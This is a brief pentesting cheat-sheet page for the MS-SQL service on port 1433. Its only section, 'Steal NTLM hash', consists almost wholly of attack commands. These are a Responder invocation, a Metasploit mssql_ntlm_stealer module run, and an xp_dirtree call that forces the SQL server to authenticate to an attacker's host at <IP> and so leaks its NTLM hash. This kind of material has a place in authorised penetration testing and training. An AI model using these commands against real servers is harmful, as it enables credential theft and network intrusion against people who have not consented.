Pentesting MS-SQL - Port 1433

A list of Pentesting Techniques for MS-SQL service.

Steal NTLM hash

# use responder
└─$ sudo responder -I <IP> -w -d                            

# steal from msfconsole
use admin/mssql/mssql_ntlm_stealer
set SMBPROXY <IP>
exploit

# steal from ms-sql console
SQL> exec master.dbo.xp_dirtree '\\<IP>' 

Last updated